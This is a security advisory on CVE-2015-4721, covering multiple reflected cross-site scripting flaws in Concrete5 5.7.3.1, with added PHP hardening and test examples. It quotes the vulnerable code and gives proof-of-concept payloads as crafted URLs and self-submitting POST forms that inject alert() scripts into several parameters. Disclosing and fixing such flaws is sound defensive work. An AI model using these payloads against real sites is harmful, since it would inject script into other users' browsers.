Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted
Multiple Reflected Cross Site
Scripting Vulnerabilities in
Concrete5 version 5.7.3.1
Author: Egidio Romano
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 1/4
Summary

Vulnerabilities Class: Cross Site Scripting (XSS)
CVE ID: CVE-2015-4721
Remote: Yes
Local: No
Published: June 6, 2015
Updated: June 24, 2015
Credit: Egidio Romano
Vulnerable Version: 5.7.3.1 and probably prior versions
Fixed On: 5.7.4
Other References:
  https://hackerone.com/reports/59661
  http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html
Description
Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because
certain user input is being used within the output it generates without validating or
encoding it.
Vulnerabilities Details
Following are the reflected XSS vulnerabilities identified:
File: /concrete/views/panels/details/page/versions.php (lines 5-14):

<?php foreach($_REQUEST['cvID'] as $cvID) {
    $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
    $checked = false;
}
print $ih->tabs($tabs);
foreach($_REQUEST['cvID'] as $cvID) { ?>
<div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%">
<iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" />
User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these:

http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--
http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
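The hardening a defender would apply to the versions.php excerpt above, as an added example written for this page: it is neither the advisory's code nor Concrete5's 5.7.4 fix (which the advisory does not reproduce). attr_escape() and read_id() are names introduced here; $ih, t(), $display and REL_DIR_FILES_TOOLS_REQUIRED are assumed to be in scope exactly as in the original template, and $checked is assumed to start true (the lines above the excerpt are not on the page).

```php
<?php
// Added hardening example, not code from the advisory or from Concrete5's 5.7.4 fix:
// the versions.php loop from the page, rewritten so request data is validated before
// use and encoded at every point it is echoed into HTML. Assumes the template's own
// $ih->tabs(), t(), $display and REL_DIR_FILES_TOOLS_REQUIRED are in scope.

/** Encode a value for a double-quoted HTML attribute context. */
function attr_escape($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

/** Return $raw as a positive integer, or null when it is not a plain decimal id. */
function read_id($raw)
{
    $raw = (string) $raw;
    return (ctype_digit($raw) && $raw !== '0') ? (int) $raw : null;
}

// Step 1: validate. cvID and cID are identifiers, so only positive integers are accepted;
// anything else (including the "><script> payloads shown on the page) is dropped.
$cvIDs = array();
$rawList = isset($_REQUEST['cvID']) ? (array) $_REQUEST['cvID'] : array();
foreach ($rawList as $raw) {
    $id = read_id($raw);
    if ($id !== null) {
        $cvIDs[] = $id;
    }
}
$cID = isset($_REQUEST['cID']) ? read_id($_REQUEST['cID']) : null;
if ($cID === null || count($cvIDs) === 0) {
    // Nothing to render for an invalid request; the original template rendered it anyway.
    return;
}

$checked = true;   // assumption: the excerpt's first iteration marks the first tab checked
$tabs = array();
foreach ($cvIDs as $cvID) {
    $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
    $checked = false;
}
print $ih->tabs($tabs);

// Step 2: encode. $cvID and $cID are integers now, but every value written into an
// attribute still goes through attr_escape(), so the output stays inert if the
// validation above is ever relaxed or bypassed.
foreach ($cvIDs as $cvID) {
    $previewUrl = REL_DIR_FILES_TOOLS_REQUIRED . '/pages/preview_version?cvID=' . $cvID . '&cID=' . $cID;
?>
<div id="ccm-tab-content-view-version-<?php echo attr_escape($cvID) ?>" style="display: <?php echo attr_escape($display) ?>; height: 100%">
    <iframe border="0" id="v<?php echo time() ?>" frameborder="0" height="100%" width="100%"
            src="<?php echo attr_escape($previewUrl) ?>"></iframe>
</div>
<?php } ?>
```

Validation alone would already stop both URLs from the advisory, since neither payload is a decimal id. The encoding step is kept regardless because the div id and the iframe src are attribute contexts, and htmlspecialchars with ENT_QUOTES is what makes a stray quote or angle bracket harmless there whatever the value's origin; note that it also turns the `&` in the preview URL into `&amp;`, which is what the original template wrote by hand.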
File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):

public function selectUser($fieldName, $uID = false, $javascriptFunc …
    $selectedUID = 0;
    if (isset($_REQUEST[$fieldName])) {
        $selectedUID = $_REQUEST[$fieldName];
    } else if ($uID > 0) {
        $selectedUID = $uID;
    }
    $html = '';
    $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-selected-item-inner"><strong class="ccm-summary-selected-item-label">';
    if ($selectedUID > 0) {
        $ui = UserInfo::getByID($selectedUID);
        $html .= $ui->getUserName();
    }
    $html .= '</strong></div>';
    $identifier = new \Concrete\Core\Utility\Service\Identifier();
    $selector = $identifier->getString(32);
    $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
    $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';
User input passed through the “uID” request parameter is not properly sanitized before
being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious URL like this:
http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/elements/group/search.php (lines 4-20):

$searchRequest = $_REQUEST;
$result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
$tree = GroupTree::get();
$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
?>
<style type="text/css">
div[data-search=groups] form.ccm-search-fields {
    margin-left: 0px !important;
}
</style>
<div data-search="groups">
<script type="text/template" data-template="search-form">
<form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-search-fields-none">
<input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />
User input passed through the “filter” request parameter is not properly sanitized before
being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious URL like this:
http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon
User input passed through the “msCountry” POST parameter is not properly sanitized
before being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious web page like this:
<html>
<body>
<form method="POST"
action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
URL: http://[host]/index.php/dashboard/pages/single
User input passed through the “pageURL” POST parameter is not properly sanitized before
being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious web page like this:
<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
File: /concrete/attributes/select/form.php (lines 55-60):

$vals = $this->post('atSelectNewOption');
if (is_array($vals)) {
    foreach($vals as $v) { ?>
    <div class="newAttrValue">
        <?php echo $form->hidden($this->field('atSelectNewOption') . '[]', $v)?>
        <span class="badge"><?php echo $v?></span>
User input passed through the “atSelectNewOption” POST parameter is not properly
sanitized before being used to generate HTML output. This can be exploited by an attacker
to inject arbitrary script code into another user’s browser.
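The remaining findings (UserSelector.php, group/search.php, the load_icon and single-page POST parameters, and select/form.php) share one defect: a request value concatenated straight into a double-quoted attribute or into element text. The following added example, written for this page and not taken from the advisory or from Concrete5, shows that vulnerable shape next to its hardened form together with a small regression check a reviewer could keep. hidden_input_vulnerable(), hidden_input_safe(), badge_safe(), selected_uid() and value_survives_intact() are names introduced here; h() is modelled on the htmlspecialchars-based helper of that name which Concrete5 5.7 provides and is redefined (guarded) only so the file runs stand-alone; the hostile value is constructed for the demonstration.

```php
<?php
// Added example, not code from the advisory or from Concrete5: the attribute-context
// pattern shared by UserSelector.php (value="..."), group/search.php (the filter input)
// and select/form.php (atSelectNewOption), vulnerable and hardened side by side.
// h() mirrors Concrete5 5.7's helper of that name; redefined here so this runs alone.

if (!function_exists('h')) {
    function h($value)
    {
        return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable shape (as in the excerpts): request data is concatenated straight into a
// double-quoted attribute, so a value containing "> closes the attribute and the tag.
function hidden_input_vulnerable($name, $value)
{
    return '<input type="hidden" name="' . $name . '" value="' . $value . '">';
}

// Hardened shape: name and value are both encoded for the attribute context.
function hidden_input_safe($name, $value)
{
    return '<input type="hidden" name="' . h($name) . '" value="' . h($value) . '">';
}

// Text context (the <span class="badge"> in select/form.php): same encoder, different slot.
function badge_safe($value)
{
    return '<span class="badge">' . h($value) . '</span>';
}

// UserSelector's "request value wins over the default" logic, with the value treated as
// the integer id it is meant to be instead of an arbitrary string.
function selected_uid(array $request, $fieldName, $uID = false)
{
    if (isset($request[$fieldName]) && ctype_digit((string) $request[$fieldName])) {
        return (int) $request[$fieldName];
    }
    return ($uID > 0) ? (int) $uID : 0;
}

// Regression check: parse the rendered fragment as a browser would and require that
// exactly one <input> came out, no <script> appeared, and the value round-tripped intact.
function value_survives_intact($html, $expected)
{
    $doc = new DOMDocument();
    @$doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    $inputs  = $doc->getElementsByTagName('input');
    $scripts = $doc->getElementsByTagName('script');
    return $inputs->length === 1
        && $scripts->length === 0
        && $inputs->item(0)->getAttribute('value') === $expected;
}

$hostile = '"><script>alert(/XSS/)</script>';   // constructed, same shape as the page's PoCs

echo hidden_input_vulnerable('filter', $hostile), "\n";
echo hidden_input_safe('filter', $hostile), "\n";
echo badge_safe($hostile), "\n";
echo 'selected uid: ', selected_uid(array('uID' => $hostile), 'uID', 7), "\n";
echo 'vulnerable survives intact: ', value_survives_intact(hidden_input_vulnerable('filter', $hostile), $hostile) ? 'yes' : 'no', "\n";
echo 'hardened survives intact:   ', value_survives_intact(hidden_input_safe('filter', $hostile), $hostile) ? 'yes' : 'no', "\n";
```

With the hostile value, the vulnerable builder emits an empty value attribute followed by a live script element, so the check reports that the value did not survive; the hardened builder emits `&quot;&gt;&lt;script&gt;...` inside the attribute, which the DOM parser decodes back to the original string with no extra elements. selected_uid() falls back to the default id because the hostile string is not a decimal integer. The check deliberately parses the HTML rather than grepping for `<script`, since an attribute break-out can carry any tag, not just the one used in the advisory's proof of concept.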
